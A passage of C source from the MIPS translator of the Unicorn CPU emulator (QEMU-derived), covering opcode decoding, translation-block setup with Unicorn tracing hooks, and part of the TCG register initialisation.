generate_exception_end(ctx, EXCP_RI); break; case OPC_SYNCI: check_insn(ctx, ISA_MIPS32R2); /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; break; case OPC_BPOSGE32: /* MIPS DSP branch */ #if defined(TARGET_MIPS64) case OPC_BPOSGE64: #endif check_dsp(ctx); gen_compute_branch(ctx, op1, 4, -1, -2, (int32_t)imm << 2, 4); break; #if defined(TARGET_MIPS64) case OPC_DAHI: check_insn(ctx, ISA_MIPS32R6); check_mips_64(ctx); if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rs], (int64_t)imm << 32); } break; case OPC_DATI: check_insn(ctx, ISA_MIPS32R6); check_mips_64(ctx); if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rs], (int64_t)imm << 48); } break; #endif default: /* Invalid */ MIPS_INVAL("regimm"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_CP0: check_cp0_enabled(ctx); op1 = MASK_CP0(ctx->opcode); switch (op1) { case OPC_MFC0: case OPC_MTC0: case OPC_MFTR: case OPC_MTTR: case OPC_MFHC0: case OPC_MTHC0: #if defined(TARGET_MIPS64) case OPC_DMFC0: case OPC_DMTC0: #endif gen_cp0(env, ctx, op1, rt, rd); break; case OPC_C0: case OPC_C0_1: case OPC_C0_2: case OPC_C0_3: case OPC_C0_4: case OPC_C0_5: case OPC_C0_6: case OPC_C0_7: case OPC_C0_8: case OPC_C0_9: case OPC_C0_A: case OPC_C0_B: case OPC_C0_C: case OPC_C0_D: case OPC_C0_E: case OPC_C0_F: gen_cp0(env, ctx, MASK_C0(ctx->opcode), rt, rd); break; case OPC_MFMC0: { uint32_t op2; TCGv t0 = tcg_temp_new(tcg_ctx); op2 = MASK_MFMC0(ctx->opcode); switch (op2) { case OPC_DMT: check_cp0_mt(ctx); gen_helper_dmt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_EMT: check_cp0_mt(ctx); gen_helper_emt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_DVPE: check_cp0_mt(ctx); gen_helper_dvpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_EVPE: check_cp0_mt(ctx); gen_helper_evpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_DVP: check_insn(ctx, ISA_MIPS32R6); if (ctx->vp) { gen_helper_dvp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; case OPC_EVP: check_insn(ctx, ISA_MIPS32R6); if (ctx->vp) { gen_helper_evp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; case OPC_DI: check_insn(ctx, ISA_MIPS32R2); save_cpu_state(ctx, 1); gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* * Stop translation as we may have switched * the execution mode. */ ctx->base.is_jmp = DISAS_STOP; break; case OPC_EI: check_insn(ctx, ISA_MIPS32R2); save_cpu_state(ctx, 1); gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* * DISAS_STOP isn't sufficient, we need to ensure we break * out of translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; break; default: /* Invalid */ MIPS_INVAL("mfmc0"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); } break; case OPC_RDPGPR: check_insn(ctx, ISA_MIPS32R2); gen_load_srsgpr(tcg_ctx, rt, rd); break; case OPC_WRPGPR: check_insn(ctx, ISA_MIPS32R2); gen_store_srsgpr(tcg_ctx, rt, rd); break; default: MIPS_INVAL("cp0"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC, OPC_ADDI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BOVC, OPC_BEQZALC, OPC_BEQC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_ADDI */ /* Arithmetic with immediate opcode */ gen_arith_imm(ctx, op, rt, rs, imm); } break; case OPC_ADDIU: gen_arith_imm(ctx, op, rt, rs, imm); break; case OPC_SLTI: /* Set on less than with immediate opcode */ case OPC_SLTIU: gen_slt_imm(ctx, op, rt, rs, imm); break; case OPC_ANDI: /* Arithmetic with immediate opcode */ case OPC_LUI: /* OPC_AUI */ case OPC_ORI: case OPC_XORI: gen_logic_imm(ctx, op, rt, rs, imm); break; case OPC_J: /* Jump */ case OPC_JAL: offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); break; /* Branch */ case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC, OPC_BLEZL */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rt == 0) { generate_exception_end(ctx, EXCP_RI); break; } /* OPC_BLEZC, OPC_BGEZC, OPC_BGEC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_BLEZL */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } break; case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC, OPC_BGTZL */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rt == 0) { generate_exception_end(ctx, EXCP_RI); break; } /* OPC_BGTZC, OPC_BLTZC, OPC_BLTC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_BGTZL */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } break; case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC, OPC_BLEZ */ if (rt == 0) { /* OPC_BLEZ */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } else { check_insn(ctx, ISA_MIPS32R6); /* OPC_BLEZALC, OPC_BGEZALC, OPC_BGEUC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } break; case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC, OPC_BGTZ */ if (rt == 0) { /* OPC_BGTZ */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } else { check_insn(ctx, ISA_MIPS32R6); /* OPC_BGTZALC, OPC_BLTZALC, OPC_BLTUC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } break; case OPC_BEQL: case OPC_BNEL: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); /* Fallthrough */ case OPC_BEQ: case OPC_BNE: gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); break; case OPC_LL: /* Load and stores */ check_insn(ctx, ISA_MIPS2); if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } /* Fallthrough */ case OPC_LWL: case OPC_LWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* Fallthrough */ case OPC_LB: case OPC_LH: case OPC_LW: case OPC_LWPC: case OPC_LBU: case OPC_LHU: gen_ld(ctx, op, rt, rs, imm); break; case OPC_SWL: case OPC_SWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_SB: case OPC_SH: case OPC_SW: gen_st(ctx, op, rt, rs, imm); break; case OPC_SC: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } gen_st_cond(ctx, rt, rs, imm, MO_TESL, false); break; case OPC_CACHE: check_insn_opc_removed(ctx, ISA_MIPS32R6); check_cp0_enabled(ctx); check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } /* Treat as NOP. */ break; case OPC_PREF: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->insn_flags & INSN_R5900) { /* Treat as NOP. */ } else { check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); /* Treat as NOP. */ } break; /* Floating point (COP1). */ case OPC_LWC1: case OPC_LDC1: case OPC_SWC1: case OPC_SDC1: gen_cop1_ldst(ctx, op, rt, rs, imm); break; case OPC_CP1: op1 = MASK_CP1(ctx->opcode); switch (op1) { case OPC_MFHC1: case OPC_MTHC1: check_cp1_enabled(ctx); check_insn(ctx, ISA_MIPS32R2); /* fall through */ case OPC_MFC1: case OPC_CFC1: case OPC_MTC1: case OPC_CTC1: check_cp1_enabled(ctx); gen_cp1(ctx, op1, rt, rd); break; #if defined(TARGET_MIPS64) case OPC_DMFC1: case OPC_DMTC1: check_cp1_enabled(ctx); check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_cp1(ctx, op1, rt, rd); break; #endif case OPC_BC1EQZ: /* OPC_BC1ANY2 */ check_cp1_enabled(ctx); if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BC1EQZ */ gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), rt, imm << 2, 4); } else { /* OPC_BC1ANY2 */ check_cop1x(ctx); check_insn(ctx, ASE_MIPS3D); gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), (rt >> 2) & 0x7, imm << 2); } break; case OPC_BC1NEZ: check_cp1_enabled(ctx); check_insn(ctx, ISA_MIPS32R6); gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), rt, imm << 2, 4); break; case OPC_BC1ANY4: check_cp1_enabled(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); check_cop1x(ctx); check_insn(ctx, ASE_MIPS3D); /* fall through */ case OPC_BC1: check_cp1_enabled(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), (rt >> 2) & 0x7, imm << 2); break; case OPC_PS_FMT: check_ps(ctx); /* fall through */ case OPC_S_FMT: case OPC_D_FMT: check_cp1_enabled(ctx); gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, (imm >> 8) & 0x7); break; case OPC_W_FMT: case OPC_L_FMT: { int r6_op = ctx->opcode & FOP(0x3f, 0x1f); check_cp1_enabled(ctx); if (ctx->insn_flags & ISA_MIPS32R6) { switch (r6_op) { case R6_OPC_CMP_AF_S: case R6_OPC_CMP_UN_S: case R6_OPC_CMP_EQ_S: case R6_OPC_CMP_UEQ_S: case R6_OPC_CMP_LT_S: case R6_OPC_CMP_ULT_S: case R6_OPC_CMP_LE_S: case R6_OPC_CMP_ULE_S: case R6_OPC_CMP_SAF_S: case R6_OPC_CMP_SUN_S: case R6_OPC_CMP_SEQ_S: case R6_OPC_CMP_SEUQ_S: case R6_OPC_CMP_SLT_S: case R6_OPC_CMP_SULT_S: case R6_OPC_CMP_SLE_S: case R6_OPC_CMP_SULE_S: case R6_OPC_CMP_OR_S: case R6_OPC_CMP_UNE_S: case R6_OPC_CMP_NE_S: case R6_OPC_CMP_SOR_S: case R6_OPC_CMP_SUNE_S: case R6_OPC_CMP_SNE_S: gen_r6_cmp_s(ctx, ctx->opcode & 0x1f, rt, rd, sa); break; case R6_OPC_CMP_AF_D: case R6_OPC_CMP_UN_D: case R6_OPC_CMP_EQ_D: case R6_OPC_CMP_UEQ_D: case R6_OPC_CMP_LT_D: case R6_OPC_CMP_ULT_D: case R6_OPC_CMP_LE_D: case R6_OPC_CMP_ULE_D: case R6_OPC_CMP_SAF_D: case R6_OPC_CMP_SUN_D: case R6_OPC_CMP_SEQ_D: case R6_OPC_CMP_SEUQ_D: case R6_OPC_CMP_SLT_D: case R6_OPC_CMP_SULT_D: case R6_OPC_CMP_SLE_D: case R6_OPC_CMP_SULE_D: case R6_OPC_CMP_OR_D: case R6_OPC_CMP_UNE_D: case R6_OPC_CMP_NE_D: case R6_OPC_CMP_SOR_D: case R6_OPC_CMP_SUNE_D: case R6_OPC_CMP_SNE_D: gen_r6_cmp_d(ctx, ctx->opcode & 0x1f, rt, rd, sa); break; default: gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, (imm >> 8) & 0x7); break; } } else { gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, (imm >> 8) & 0x7); } break; } case OPC_BZ_V: case OPC_BNZ_V: case OPC_BZ_B: case OPC_BZ_H: case OPC_BZ_W: case OPC_BZ_D: case OPC_BNZ_B: case OPC_BNZ_H: case OPC_BNZ_W: case OPC_BNZ_D: check_insn(ctx, ASE_MSA); gen_msa_branch(env, ctx, op1); break; default: MIPS_INVAL("cp1"); generate_exception_end(ctx, EXCP_RI); break; } break; /* Compact branches [R6] and COP2 [non-R6] */ case OPC_BC: /* OPC_LWC2 */ case OPC_BALC: /* OPC_SWC2 */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BC, OPC_BALC */ gen_compute_compact_branch(ctx, op, 0, 0, sextract32(ctx->opcode << 2, 0, 28)); } else { /* OPC_LWC2, OPC_SWC2 */ /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); } break; case OPC_BEQZC: /* OPC_JIC, OPC_LDC2 */ case OPC_BNEZC: /* OPC_JIALC, OPC_SDC2 */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs != 0) { /* OPC_BEQZC, OPC_BNEZC */ gen_compute_compact_branch(ctx, op, rs, 0, sextract32(ctx->opcode << 2, 0, 23)); } else { /* OPC_JIC, OPC_JIALC */ gen_compute_compact_branch(ctx, op, 0, rt, imm); } } else { /* OPC_LWC2, OPC_SWC2 */ /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); } break; case OPC_CP2: check_insn(ctx, INSN_LOONGSON2F); /* Note that these instructions use different fields. */ gen_loongson_multimedia(ctx, sa, rd, rt); break; case OPC_CP3: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); op1 = MASK_CP3(ctx->opcode); switch (op1) { case OPC_LUXC1: case OPC_SUXC1: check_insn(ctx, ISA_MIPS5 | ISA_MIPS32R2); /* Fallthrough */ case OPC_LWXC1: case OPC_LDXC1: case OPC_SWXC1: case OPC_SDXC1: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32R2); gen_flt3_ldst(ctx, op1, sa, rd, rs, rt); break; case OPC_PREFX: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32R2); /* Treat as NOP. */ break; case OPC_ALNV_PS: check_insn(ctx, ISA_MIPS5 | ISA_MIPS32R2); /* Fallthrough */ case OPC_MADD_S: case OPC_MADD_D: case OPC_MADD_PS: case OPC_MSUB_S: case OPC_MSUB_D: case OPC_MSUB_PS: case OPC_NMADD_S: case OPC_NMADD_D: case OPC_NMADD_PS: case OPC_NMSUB_S: case OPC_NMSUB_D: case OPC_NMSUB_PS: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32R2); gen_flt3_arith(ctx, op1, sa, rs, rd, rt); break; default: MIPS_INVAL("cp3"); generate_exception_end(ctx, EXCP_RI); break; } } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; #if defined(TARGET_MIPS64) /* MIPS64 opcodes */ case OPC_LLD: if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } /* fall through */ case OPC_LDL: case OPC_LDR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_LWU: case OPC_LD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, op, rt, rs, imm); break; case OPC_SDL: case OPC_SDR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_SD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st(ctx, op, rt, rs, imm); break; case OPC_SCD: check_insn_opc_removed(ctx, ISA_MIPS32R6); check_insn(ctx, ISA_MIPS3); if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } check_mips_64(ctx); gen_st_cond(ctx, rt, rs, imm, MO_TEQ, false); break; case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC, OPC_DADDI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BNVC, OPC_BNEZALC, OPC_BNEC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_DADDI */ check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith_imm(ctx, op, rt, rs, imm); } break; case OPC_DADDIU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith_imm(ctx, op, rt, rs, imm); break; #else case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ if (ctx->insn_flags & ISA_MIPS32R6) { gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { MIPS_INVAL("major opcode"); generate_exception_end(ctx, EXCP_RI); } break; #endif case OPC_DAUI: /* OPC_JALX */ if (ctx->insn_flags & ISA_MIPS32R6) { #if defined(TARGET_MIPS64) /* OPC_DAUI */ check_mips_64(ctx); if (rs == 0) { generate_exception(ctx, EXCP_RI); } else if (rt != 0) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, imm << 16); tcg_temp_free(tcg_ctx, t0); } #else generate_exception_end(ctx, EXCP_RI); MIPS_INVAL("major opcode"); #endif } else { /* OPC_JALX */ check_insn(ctx, ASE_MIPS16 | ASE_MICROMIPS); offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); } break; case OPC_MSA: /* OPC_MDMX */ if (ctx->insn_flags & INSN_R5900) { #if defined(TARGET_MIPS64) gen_mmi_lq(env, ctx); /* MMI_OPC_LQ */ #endif } else { /* MDMX: Not implemented. */ gen_msa(env, ctx); } break; case OPC_PCREL: check_insn(ctx, ISA_MIPS32R6); gen_pcrel(ctx, ctx->opcode, ctx->base.pc_next, rs); break; default: /* Invalid */ MIPS_INVAL("major opcode"); generate_exception_end(ctx, EXCP_RI); break; } } static void mips_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); CPUMIPSState *env = cs->env_ptr; // unicorn setup ctx->uc = cs->uc; ctx->page_start = ctx->base.pc_first & TARGET_PAGE_MASK; ctx->saved_pc = -1; ctx->insn_flags = env->insn_flags; ctx->CP0_Config1 = env->CP0_Config1; ctx->CP0_Config2 = env->CP0_Config2; ctx->CP0_Config3 = env->CP0_Config3; ctx->CP0_Config5 = env->CP0_Config5; ctx->btarget = 0; ctx->kscrexist = (env->CP0_Config4 >> CP0C4_KScrExist) & 0xff; ctx->rxi = (env->CP0_Config3 >> CP0C3_RXI) & 1; ctx->ie = (env->CP0_Config4 >> CP0C4_IE) & 3; ctx->bi = (env->CP0_Config3 >> CP0C3_BI) & 1; ctx->bp = (env->CP0_Config3 >> CP0C3_BP) & 1; ctx->PAMask = env->PAMask; ctx->mvh = (env->CP0_Config5 >> CP0C5_MVH) & 1; ctx->eva = (env->CP0_Config5 >> CP0C5_EVA) & 1; ctx->sc = (env->CP0_Config3 >> CP0C3_SC) & 1; ctx->CP0_LLAddr_shift = env->CP0_LLAddr_shift; ctx->cmgcr = (env->CP0_Config3 >> CP0C3_CMGCR) & 1; /* Restore delay slot state from the tb context. */ ctx->hflags = (uint32_t)ctx->base.tb->flags; /* FIXME: maybe use 64 bits? */ ctx->ulri = (env->CP0_Config3 >> CP0C3_ULRI) & 1; ctx->ps = ((env->active_fpu.fcr0 >> FCR0_PS) & 1) || (env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)); ctx->vp = (env->CP0_Config5 >> CP0C5_VP) & 1; ctx->mrp = (env->CP0_Config5 >> CP0C5_MRP) & 1; ctx->nan2008 = (env->active_fpu.fcr31 >> FCR31_NAN2008) & 1; ctx->abs2008 = (env->active_fpu.fcr31 >> FCR31_ABS2008) & 1; ctx->mi = (env->CP0_Config5 >> CP0C5_MI) & 1; ctx->gi = (env->CP0_Config5 >> CP0C5_GI) & 3; restore_cpu_state(env, ctx); ctx->mem_idx = hflags_mmu_index(ctx->hflags); ctx->default_tcg_memop_mask = (ctx->insn_flags & ISA_MIPS32R6) ? MO_UNALN : MO_ALIGN; LOG_DISAS("\ntb %p idx %d hflags %04x\n", ctx->base.tb, ctx->mem_idx, ctx->hflags); } static void mips_tr_tb_start(DisasContextBase *dcbase, CPUState *cs) { } static void mips_tr_insn_start(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, ctx->base.pc_next, ctx->hflags & MIPS_HFLAG_BMASK, ctx->btarget); } static bool mips_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs, const CPUBreakpoint *bp) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; save_cpu_state(ctx, 1); ctx->base.is_jmp = DISAS_NORETURN; gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); /* * The address covered by the breakpoint must be included in * [tb->pc, tb->pc + tb->size) in order to for it to be * properly cleared -- thus we increment the PC here so that * the logic setting tb->size below does the right thing. */ ctx->base.pc_next += 4; return true; } static void mips_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs) { CPUMIPSState *env = cs->env_ptr; DisasContext *ctx = container_of(dcbase, DisasContext, base); struct uc_struct *uc = cs->uc; TCGContext *tcg_ctx = uc->tcg_ctx; TCGOp *tcg_op, *prev_op = NULL; int insn_bytes; int is_slot; bool hook_insn = false; is_slot = ctx->hflags & MIPS_HFLAG_BMASK; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, ctx->base.pc_next)) { // raise a special interrupt to quit gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, ctx->base.pc_next)) { // Sync PC in advance gen_save_pc(tcg_ctx, ctx->base.pc_next); // save the last operand prev_op = tcg_last_op(tcg_ctx); hook_insn = true; gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, ctx->base.pc_next); // Don't let unicorn stop at the branch delay slot. if (!is_slot) { // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } } if (ctx->insn_flags & ISA_NANOMIPS32) { ctx->opcode = cpu_lduw_code(env, ctx->base.pc_next); insn_bytes = decode_nanomips_opc(env, ctx); } else if (!(ctx->hflags & MIPS_HFLAG_M16)) { ctx->opcode = cpu_ldl_code(env, ctx->base.pc_next); insn_bytes = 4; decode_opc(env, ctx); } else if (ctx->insn_flags & ASE_MICROMIPS) { ctx->opcode = cpu_lduw_code(env, ctx->base.pc_next); insn_bytes = decode_micromips_opc(env, ctx); } else if (ctx->insn_flags & ASE_MIPS16) { ctx->opcode = cpu_lduw_code(env, ctx->base.pc_next); insn_bytes = decode_mips16_opc(env, ctx); } else { generate_exception_end(ctx, EXCP_RI); g_assert(ctx->base.is_jmp == DISAS_NORETURN); return; } if (hook_insn) { // Unicorn: patch the callback to have the proper instruction size. if (prev_op) { // As explained further up in the function where prev_op is // assigned, we move forward in the tail queue, so we're modifying the // move instruction generated by gen_uc_tracecode() that contains // the instruction size to assign the proper size (replacing 0xF1F1F1F1). tcg_op = QTAILQ_NEXT(prev_op, link); } else { // this instruction is the first emulated code ever, // so the instruction operand is the first operand tcg_op = QTAILQ_FIRST(&tcg_ctx->ops); } tcg_op->args[1] = insn_bytes; } if (ctx->hflags & MIPS_HFLAG_BMASK) { if (!(ctx->hflags & (MIPS_HFLAG_BDS16 | MIPS_HFLAG_BDS32 | MIPS_HFLAG_FBNSLOT))) { /* * Force to generate branch as there is neither delay nor * forbidden slot. */ is_slot = 1; } if ((ctx->hflags & MIPS_HFLAG_M16) && (ctx->hflags & MIPS_HFLAG_FBNSLOT)) { /* * Force to generate branch as microMIPS R6 doesn't restrict * branches in the forbidden slot. */ is_slot = 1; } } if (is_slot) { gen_branch(ctx, insn_bytes); } ctx->base.pc_next += insn_bytes; if (ctx->base.is_jmp != DISAS_NEXT) { return; } /* * Execute a branch and its delay slot as a single instruction. * This is what GDB expects and is consistent with what the * hardware does (e.g. if a delay slot instruction faults, the * reported PC is the PC of the branch). */ if (ctx->base.singlestep_enabled && (ctx->hflags & MIPS_HFLAG_BMASK) == 0) { ctx->base.is_jmp = DISAS_TOO_MANY; } if (ctx->base.pc_next - ctx->page_start >= TARGET_PAGE_SIZE) { ctx->base.is_jmp = DISAS_TOO_MANY; } } static void mips_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->base.singlestep_enabled && ctx->base.is_jmp != DISAS_NORETURN) { save_cpu_state(ctx, ctx->base.is_jmp != DISAS_EXIT); gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); } else { switch (ctx->base.is_jmp) { case DISAS_STOP: gen_save_pc(tcg_ctx, ctx->base.pc_next); tcg_gen_lookup_and_goto_ptr(tcg_ctx); break; case DISAS_NEXT: case DISAS_TOO_MANY: save_cpu_state(ctx, 0); gen_goto_tb(ctx, 0, ctx->base.pc_next); break; case DISAS_EXIT: tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case DISAS_NORETURN: break; default: g_assert_not_reached(); } } } static const TranslatorOps mips_tr_ops = { .init_disas_context = mips_tr_init_disas_context, .tb_start = mips_tr_tb_start, .insn_start = mips_tr_insn_start, .breakpoint_check = mips_tr_breakpoint_check, .translate_insn = mips_tr_translate_insn, .tb_stop = mips_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext ctx; memset(&ctx, 0, sizeof(ctx)); translator_loop(&mips_tr_ops, &ctx.base, cs, tb, max_insns); } void mips_tcg_init(struct uc_struct *uc) { int i; TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->cpu_gpr[0] = NULL; for (i = 1; i < 32; i++) tcg_ctx->cpu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.gpr[i]), regnames[i]); for (i = 0; i < 32; i++) { int off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[0]); tcg_ctx->msa_wr_d[i * 2] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, off, msaregnames[i * 2]); /* * The scalar floating-point unit (FPU) registers are mapped on * the MSA vector registers. */ tcg_ctx->fpu_f64[i] = tcg_ctx->msa_wr_d[i * 2]; off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[1]); tcg_ctx->msa_wr_d[i * 2 + 1] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, off, msaregnames[i * 2 + 1]); } tcg_ctx->cpu_pc = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.PC), "PC"); for (i = 0; i < MIPS_DSP_ACC; i++) { tcg_ctx->cpu_HI[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.HI[i]), regnames_HI[i]); tcg_ctx->cpu_LO[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.LO[i]), regnames_LO[i]); } tcg_ctx->cpu_dspctrl = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.DSPControl), "DSPControl"); tcg_ctx->bcond = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, bcond), "bcond"); tcg_ctx->btarget = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, btarget), "btarget"); tcg_ctx->hflags = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, hflags), "hflags"); tcg_ctx->fpu_fcr0 = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_fpu.fcr0), "fcr0"); tcg_ctx->fpu_fcr31 = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_fpu.fcr31), "fcr31"); tcg_ctx->cpu_lladdr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr), "lladdr"); tcg_ctx->cpu_llval = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llval), "llval"); #if defined(TARGET_MIPS64) tcg_ctx->cpu_mmr[0] = NULL; for (i = 1; i < 32; i++) { tcg_ctx->cpu_mmr[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.mmr[i]), regnames[i]); } #endif #if !defined(TARGET_MIPS64) for (i = 0; i < NUMBER_OF_MXU_REGISTERS - 1; i++) { tcg_ctx->mxu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.mxu_gpr[i]), mxuregnames[i]); } tcg_ctx->mxu_CR = tcg_global_mem_new(tcg_ctx, 